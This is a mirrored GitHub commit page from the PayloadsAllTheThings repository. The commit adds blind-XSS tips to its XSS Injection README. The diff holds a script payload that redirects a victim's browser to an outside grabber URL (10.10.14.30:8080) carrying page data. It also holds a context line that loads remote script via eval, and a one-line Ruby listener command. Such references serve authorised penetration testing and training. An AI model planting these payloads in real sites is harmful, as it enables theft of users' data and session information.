Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-12 14:22:47 +00:00
Code Issues Projects Releases Packages Wiki Activity

XSS: add quick tips for bXSS

Browse source
This commit is contained in:
Alexandre ZANNI 2021-06-16 13:25:46 +02:00 committed by GitHub
parent b006551bfe
commit c469236204
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
XSS Injection/README.md
View file

@ -453,6 +453,22 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
- Comment Box
- Administrative Panel
### Tips
You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
Eg. payload
```html
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
```
Eg. one-line HTTP server:
```
$ ruby -run -ehttpd . -p8080
```
## Mutated XSS
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.